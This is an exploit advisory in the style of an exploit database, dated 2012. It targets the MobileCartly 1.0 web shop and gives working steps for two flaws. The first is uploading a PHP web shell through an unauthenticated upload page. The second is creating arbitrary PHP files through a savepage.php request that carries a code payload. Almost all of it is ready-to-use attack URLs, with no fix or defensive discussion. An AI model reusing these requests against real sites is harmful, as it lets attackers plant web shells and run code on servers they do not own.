####################################################
### Exploit Title: MobileCartly 1.0 Multiple Vulnerabilities
### Date: 11/08/2012
### Author: L0n3ly-H34rT
### Homepage: http://se3c.tk/
### Contact: l0n3ly_h34rt@hotmail.com
### Software Link : http://mobilecartly.com/mobilecartly.zip
### Tested on: Linux/Windows
####################################################

# Remote File Upload :

just upload shell.php here :

http://127.0.0.1/mobilecartly/images/upload.php

you see your file here :

http://127.0.0.1/mobilecartly/images/productimages/shell.php

# Arbitrary file create :

http://127.0.0.1/mobilecartly/includes/savepage.php?savepage=phpinfo.php&pagecontent=<?php phpinfo(); ?>

you will see your file phpinfo.php here :

http://127.0.0.1/mobilecartly/pages/phpinfo.php

-------------------------

# Greetz to my friendz